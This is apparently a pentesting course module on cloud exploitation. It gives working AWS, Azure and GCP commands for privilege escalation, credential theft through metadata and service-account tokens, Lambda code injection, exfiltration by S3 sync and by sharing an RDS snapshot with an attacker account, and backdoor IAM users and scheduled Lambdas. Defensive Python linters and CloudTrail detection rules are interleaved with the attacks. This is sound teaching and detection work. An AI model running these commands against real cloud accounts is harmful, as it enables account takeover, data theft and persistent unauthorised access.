Cloud Pentesting & Assessment

Cloud Exploitation Techniques


Understanding cloud-specific exploitation paths is essential for both offensive testing and defensive hardening. IAM policy abuse, privilege escalation, and lateral movement techniques differ significantly from traditional infrastructure attacks.

AWS Privilege Escalation

IAM-Based Escalation Paths

iam:PassRole + service creation:

# If you can pass roles and create Lambda
aws iam create-role --role-name EscalateRole --assume-role-policy-document file://trust.json

# Create Lambda with admin role
aws lambda create-function \
    --function-name escalate \
    --runtime python3.9 \
    --role arn:aws:iam::123456789012:role/AdminRole \
    --handler index.handler \
    --zip-file fileb://payload.zip

# The Lambda code reads the passed role's credentials from its environment
# variables (AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY / AWS_SESSION_TOKEN),
# not from the instance metadata service

iam:CreatePolicyVersion:

# Create new policy version with admin permissions
aws iam create-policy-version \
    --policy-arn arn:aws:iam::123456789012:policy/TargetPolicy \
    --policy-document file://admin-policy.json \
    --set-as-default

iam:AttachUserPolicy / AttachRolePolicy:

# Attach AdministratorAccess
aws iam attach-user-policy \
    --user-name compromised-user \
    --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

Common Escalation Vectors

| Permission | Escalation Path |
| --- | --- |
| iam:PassRole + lambda:CreateFunction | Create Lambda with privileged role |
| iam:PassRole + ec2:RunInstances | Launch EC2 with instance profile |
| iam:CreatePolicyVersion | Modify policy to add permissions |
| iam:AttachUserPolicy | Attach admin policy |
| iam:PutUserPolicy | Add inline admin policy |
| sts:AssumeRole | Assume more privileged role |
| lambda:UpdateFunctionCode | Modify existing Lambda |
| ec2:ModifyInstanceAttribute | Change instance userData |
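The table above is also a review checklist: before a policy is attached, a defender can lint it for the same primitives. The following is an added example written for this page, not tooling from the original course or from AWS. It evaluates only `Effect` and `Action` (with IAM's `*`/`?` wildcards and Deny overriding Allow); `Resource`, `Condition` and `NotAction` are deliberately not modelled, so a hit means "review this policy", not "escalation is certain". The sample policy is constructed.

```python
"""Lint an IAM policy document for the escalation primitives listed in the table above.

Added example for this page (not part of the original course material). Only
Effect/Action are evaluated; Resource, Condition and NotAction are ignored, so
treat a hit as a review trigger rather than proof of an escalation path.
"""
import fnmatch

# Primitive sets taken from the "Common Escalation Vectors" table.
ESCALATION_PATHS = {
    "Create Lambda with privileged role": {"iam:PassRole", "lambda:CreateFunction"},
    "Launch EC2 with instance profile": {"iam:PassRole", "ec2:RunInstances"},
    "Modify policy to add permissions": {"iam:CreatePolicyVersion"},
    "Attach admin policy": {"iam:AttachUserPolicy"},
    "Add inline admin policy": {"iam:PutUserPolicy"},
    "Assume more privileged role": {"sts:AssumeRole"},
    "Modify existing Lambda": {"lambda:UpdateFunctionCode"},
    "Change instance userData": {"ec2:ModifyInstanceAttribute"},
}


def _as_list(value):
    """IAM allows Statement and Action to be a single value or a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def allowed_actions(policy, candidates):
    """Return the subset of `candidates` the policy allows.

    IAM action matching is case-insensitive and supports * and ? wildcards,
    which fnmatch reproduces. An explicit Deny wins over any Allow.
    """
    allowed, denied = set(), set()
    for stmt in _as_list(policy.get("Statement")):
        patterns = [p.lower() for p in _as_list(stmt.get("Action"))]
        bucket = allowed if stmt.get("Effect") == "Allow" else denied
        for action in candidates:
            if any(fnmatch.fnmatchcase(action.lower(), p) for p in patterns):
                bucket.add(action)
    return allowed - denied


def find_escalation_paths(policy):
    """Names of escalation paths whose full primitive set the policy grants."""
    candidates = set().union(*ESCALATION_PATHS.values())
    granted = allowed_actions(policy, candidates)
    return sorted(name for name, needed in ESCALATION_PATHS.items() if needed <= granted)


# Constructed sample: a broad lambda:* grant plus PassRole and CreatePolicyVersion,
# with UpdateFunctionCode explicitly denied.
SAMPLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["lambda:*", "iam:PassRole"], "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:CreatePolicyVersion", "Resource": "*"},
        {"Effect": "Deny", "Action": "lambda:UpdateFunctionCode", "Resource": "*"},
    ],
}

if __name__ == "__main__":
    for path in find_escalation_paths(SAMPLE_POLICY):
        print("review:", path)
```

`iam:PassRole` on its own produces no finding, because neither Lambda nor EC2 path is complete without the matching service action; that is the reason the table pairs them. Feeding the output of `aws iam get-policy-version` (the `Document` field) into `find_escalation_paths` turns the table into a pre-deployment gate.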

Automated Detection

# Pacu - AWS exploitation framework
python3 pacu.py

# Within Pacu:
> run iam__privesc_scan
> run iam__enum_permissions

Azure Privilege Escalation

Role Assignment Abuse

# If you have Owner or User Access Administrator
az role assignment create \
    --assignee user@domain.com \
    --role "Owner" \
    --scope /subscriptions/SUBSCRIPTION_ID

Service Principal Exploitation

# Create service principal with privileged access
az ad sp create-for-rbac \
    --name "attacker-sp" \
    --role Contributor \
    --scopes /subscriptions/SUBSCRIPTION_ID

# Use returned credentials
az login --service-principal \
    -u APP_ID \
    -p PASSWORD \
    --tenant TENANT_ID

Managed Identity Abuse

# From compromised VM/App Service with managed identity
# Get access token (the endpoint returns JSON; jq extracts the access_token field)
TOKEN=$(curl -s -H "Metadata: true" \
    "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" \
    | jq -r .access_token)

# Use token for ARM API calls
curl -H "Authorization: Bearer $TOKEN" \
    "https://management.azure.com/subscriptions?api-version=2020-01-01"

Azure AD Escalation

| Permission | Privilege Escalation |
| --- | --- |
| Application.ReadWrite.All | Create app with privileged API permissions |
| RoleManagement.ReadWrite.Directory | Assign Global Admin |
| User.ReadWrite.All | Modify user attributes |
| Group.ReadWrite.All | Add self to privileged groups |

GCP Privilege Escalation

Service Account Key Creation

# If you have iam.serviceAccountKeys.create
gcloud iam service-accounts keys create key.json \
    --iam-account admin-sa@project.iam.gserviceaccount.com

# Authenticate as service account
gcloud auth activate-service-account --key-file=key.json

setIamPolicy Abuse

# If you have setIamPolicy on project
gcloud projects set-iam-policy PROJECT_ID policy.json

# policy.json grants owner to attacker
{
  "bindings": [{
    "role": "roles/owner",
    "members": ["user:attacker@gmail.com"]
  }]
}
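`set-iam-policy` replaces the whole project policy, so a change like the one above both adds an owner and silently drops every existing binding. The added example below (written for this page, not part of the course or of Google's tooling) diffs a before/after policy the way a reviewer or a change-detection job would, flagging new bindings that use a primitive role (`roles/owner`, `roles/editor`) or that grant access to a member outside the organisation. The trusted domain `example-corp.com`, the project id `my-project` and both policies are constructed assumptions.

```python
"""Diff two GCP project IAM policies and flag risky new bindings.

Added example for this page (not from the original course). Input would
normally come from `gcloud projects get-iam-policy PROJECT_ID --format=json`
taken before and after a change; here both policies are constructed.
"""

# Basic (primitive) roles grant broad project-wide access and deserve scrutiny.
PRIMITIVE_ROLES = {"roles/owner", "roles/editor"}


def binding_pairs(policy):
    """Flatten bindings into a set of (role, member) pairs for set arithmetic."""
    return {(b["role"], m) for b in policy.get("bindings", []) for m in b.get("members", [])}


def member_is_external(member, trusted_domains, project_id):
    """True if the member is public or from a domain/project we do not own.

    Member strings look like "user:x@y", "group:x@y", "domain:y",
    "serviceAccount:x@project.iam.gserviceaccount.com", "allUsers".
    Google-managed service agents live in other projects and would be flagged;
    extend the check with an allow-list if that is noisy in practice.
    """
    if member in ("allUsers", "allAuthenticatedUsers"):
        return True
    kind, _, ident = member.partition(":")
    if kind == "serviceAccount" and ident.endswith(f"@{project_id}.iam.gserviceaccount.com"):
        return False
    domain = ident.rsplit("@", 1)[-1]
    return domain not in trusted_domains


def review_policy_change(old, new, trusted_domains, project_id):
    """Return added/removed bindings plus findings for the risky additions."""
    before, after = binding_pairs(old), binding_pairs(new)
    findings = []
    for role, member in sorted(after - before):
        reasons = []
        if role in PRIMITIVE_ROLES:
            reasons.append("primitive role")
        if member_is_external(member, trusted_domains, project_id):
            reasons.append("external member")
        if reasons:
            findings.append({"role": role, "member": member, "reasons": reasons})
    return {"added": sorted(after - before), "removed": sorted(before - after), "findings": findings}


# Constructed "before" policy for the assumed project my-project.
OLD_POLICY = {
    "etag": "BwXconstructed=",
    "bindings": [
        {"role": "roles/viewer", "members": [
            "user:alice@example-corp.com",
            "serviceAccount:ci@my-project.iam.gserviceaccount.com"]},
        {"role": "roles/owner", "members": ["user:admin@example-corp.com"]},
    ],
}

# The policy.json from the text above, applied as a full replacement.
NEW_POLICY = {"bindings": [{"role": "roles/owner", "members": ["user:attacker@gmail.com"]}]}

if __name__ == "__main__":
    report = review_policy_change(OLD_POLICY, NEW_POLICY, {"example-corp.com"}, "my-project")
    for f in report["findings"]:
        print("finding:", f["role"], f["member"], ", ".join(f["reasons"]))
    print("bindings dropped by the replacement:", len(report["removed"]))
```

Two signals fall out of the diff: the new owner binding is both a primitive role and an external member, and three legitimate bindings disappear, which is the blast radius of a full-policy replace and a good reason to alert on `SetIamPolicy` in the audit log rather than only on the new grant.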

Impersonation

# If you can impersonate service accounts
gcloud auth print-access-token \
    --impersonate-service-account=admin@project.iam.gserviceaccount.com

Lateral Movement

AWS Cross-Account Access

# Enumerate assumable roles
aws iam list-roles \
    --query 'Roles[*].[RoleName,AssumeRolePolicyDocument]'

# Assume cross-account role
aws sts assume-role \
    --role-arn arn:aws:iam::TARGET_ACCOUNT:role/TrustedRole \
    --role-session-name lateral-movement

# Use new credentials
export AWS_ACCESS_KEY_ID=...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...

Lambda Function Code Injection

# Modify existing Lambda function
cat > payload.py << 'EOF'
import boto3
import os

def handler(event, context):
    client = boto3.client('sts')
    creds = client.assume_role(
        RoleArn=os.environ['TARGET_ROLE'],
        RoleSessionName='injected'
    )
    # Exfiltrate credentials
    return creds['Credentials']
EOF

zip payload.zip payload.py
aws lambda update-function-code \
    --function-name target-function \
    --zip-file fileb://payload.zip

Kubernetes Service Account Token

# From compromised pod (the token is mounted unless automountServiceAccountToken is false)
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)

# Use token to access API
kubectl --token=$TOKEN --server=https://kubernetes.default auth can-i --list
kubectl --token=$TOKEN get secrets -A

Data Exfiltration

S3 Bucket Exfiltration

# Copy entire bucket
aws s3 sync s3://target-bucket ./exfil/

# If bucket is public
aws s3 cp s3://target-bucket/sensitive.db ./exfil/ --no-sign-request

Database Snapshot Sharing

# Share RDS snapshot with attacker account
aws rds modify-db-snapshot-attribute \
    --db-snapshot-identifier target-snapshot \
    --attribute-name restore \
    --values-to-add ATTACKER_ACCOUNT_ID

# In attacker account, restore snapshot
aws rds restore-db-instance-from-db-snapshot \
    --db-instance-identifier stolen-db \
    --db-snapshot-identifier arn:aws:rds:region:VICTIM:snapshot:target-snapshot

Persistence Techniques

IAM User/Access Key Creation

# Create backdoor user
aws iam create-user --user-name service-automation

# Create access keys
aws iam create-access-key --user-name service-automation

# Attach permissions
aws iam attach-user-policy \
    --user-name service-automation \
    --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

Lambda Backdoor

# Create persistent Lambda triggered by CloudWatch Events
aws events put-rule \
    --name backdoor-trigger \
    --schedule-expression "rate(1 day)"

aws lambda add-permission \
    --function-name backdoor \
    --statement-id events \
    --action lambda:InvokeFunction \
    --principal events.amazonaws.com

aws events put-targets \
    --rule backdoor-trigger \
    --targets "Id"="1","Arn"="arn:aws:lambda:region:account:function:backdoor"
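Every AWS command in the lateral movement, exfiltration and persistence sections above leaves a CloudTrail record, which is where a defender catches them. The following added example (written for this page, not from the course or from AWS) runs a small rule set over constructed CloudTrail-style records covering cross-account `AssumeRole`, Lambda code replacement, RDS snapshot sharing, IAM user/key/admin-policy persistence and EventBridge-triggered Lambdas. The account ids, user names and field subset are constructed assumptions; real records carry many more fields.

```python
"""Triage CloudTrail-style records for the lateral-movement, exfiltration and
persistence techniques covered above. Added example for this page; the
records below are constructed and trimmed to the fields the rules read.
"""

HOME_ACCOUNT = "111111111111"  # assumed: the account whose trail is reviewed

# Constructed sample records (not real CloudTrail data).
SAMPLE_EVENTS = [
    {"eventName": "AssumeRole", "eventSource": "sts.amazonaws.com",
     "userIdentity": {"accountId": "222222222222"}, "recipientAccountId": HOME_ACCOUNT,
     "requestParameters": {"roleArn": "arn:aws:iam::111111111111:role/TrustedRole",
                           "roleSessionName": "lateral-movement"}},
    {"eventName": "UpdateFunctionCode20150331v2", "eventSource": "lambda.amazonaws.com",
     "userIdentity": {"accountId": HOME_ACCOUNT},
     "requestParameters": {"functionName": "target-function"}},
    {"eventName": "ModifyDBSnapshotAttribute", "eventSource": "rds.amazonaws.com",
     "userIdentity": {"accountId": HOME_ACCOUNT},
     "requestParameters": {"dBSnapshotIdentifier": "target-snapshot",
                           "attributeName": "restore", "valuesToAdd": ["333333333333"]}},
    {"eventName": "CreateAccessKey", "eventSource": "iam.amazonaws.com",
     "userIdentity": {"accountId": HOME_ACCOUNT},
     "requestParameters": {"userName": "service-automation"}},
    {"eventName": "AttachUserPolicy", "eventSource": "iam.amazonaws.com",
     "userIdentity": {"accountId": HOME_ACCOUNT},
     "requestParameters": {"userName": "service-automation",
                           "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}},
    {"eventName": "PutTargets", "eventSource": "events.amazonaws.com",
     "userIdentity": {"accountId": HOME_ACCOUNT},
     "requestParameters": {"rule": "backdoor-trigger", "targets": [
         {"id": "1", "arn": "arn:aws:lambda:us-east-1:111111111111:function:backdoor"}]}},
    {"eventName": "DescribeInstances", "eventSource": "ec2.amazonaws.com",
     "userIdentity": {"accountId": HOME_ACCOUNT}, "requestParameters": {}},
]


def account_of(arn):
    """Account id is the fifth colon-separated ARN field."""
    parts = arn.split(":")
    return parts[4] if len(parts) > 4 else ""


def rule_cross_account_assume(e):
    """AssumeRole where the caller's account differs from the role's account."""
    if e["eventName"] != "AssumeRole":
        return None
    target = account_of(e["requestParameters"].get("roleArn", ""))
    caller = e["userIdentity"].get("accountId", "")
    if target and caller and target != caller:
        return f"cross-account AssumeRole from {caller} into {target}"
    return None


def rule_lambda_code_change(e):
    """Lambda logs UpdateFunctionCode with an API-version suffix; match the prefix."""
    if e["eventName"].startswith("UpdateFunctionCode"):
        return f"Lambda code replaced: {e['requestParameters'].get('functionName')}"
    return None


def rule_snapshot_shared(e):
    """RDS snapshot restore permission granted to any account but our own ('all' = public)."""
    p = e["requestParameters"]
    if e["eventName"] == "ModifyDBSnapshotAttribute" and p.get("attributeName") == "restore":
        foreign = [a for a in p.get("valuesToAdd", []) if a != HOME_ACCOUNT]
        if foreign:
            return f"snapshot {p.get('dBSnapshotIdentifier')} shared with {','.join(foreign)}"
    return None


def rule_iam_persistence(e):
    """New principals/keys, or AdministratorAccess attached to a user."""
    p = e["requestParameters"]
    if e["eventName"] in ("CreateUser", "CreateAccessKey"):
        return f"{e['eventName']} for {p.get('userName')}"
    if e["eventName"] == "AttachUserPolicy" and p.get("policyArn", "").endswith("/AdministratorAccess"):
        return f"AdministratorAccess attached to {p.get('userName')}"
    return None


def rule_scheduled_lambda(e):
    """An EventBridge rule gaining a Lambda target: the persistence pattern above."""
    if e["eventName"] == "PutTargets":
        lambdas = [t["arn"] for t in e["requestParameters"].get("targets", []) if ":lambda:" in t.get("arn", "")]
        if lambdas:
            return f"EventBridge rule {e['requestParameters'].get('rule')} now invokes {','.join(lambdas)}"
    return None


RULES = [rule_cross_account_assume, rule_lambda_code_change, rule_snapshot_shared,
         rule_iam_persistence, rule_scheduled_lambda]


def triage(events):
    """Return (eventName, reason) for every record that trips a rule."""
    findings = []
    for e in events:
        for rule in RULES:
            reason = rule(e)
            if reason:
                findings.append((e["eventName"], reason))
    return findings


if __name__ == "__main__":
    for name, reason in triage(SAMPLE_EVENTS):
        print(f"{name:32} {reason}")
```

The snapshot rule treats the literal value `all` as foreign, so making a snapshot public trips it as well. In production these rules belong in whatever consumes the trail (CloudWatch Logs metric filters, a SIEM, or EventBridge rules on the CloudTrail event bus); the point of the example is that each technique on this page maps to one or two specific event names and request parameters.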

Exploitation Checklist

| Phase | AWS | Azure | GCP |
| --- | --- | --- | --- |
| Priv Esc | PassRole, CreatePolicyVersion | Role assignments, Managed Identity | setIamPolicy, SA keys |
| Lateral | AssumeRole, Lambda injection | Service principals | Impersonation |
| Persist | IAM users, Lambda | App registration | SA keys |
| Exfil | S3 sync, snapshot share | Blob download | gsutil |

Next, we'll explore cloud security assessment tools and frameworks.

Module 6: Cloud Pentesting & Assessment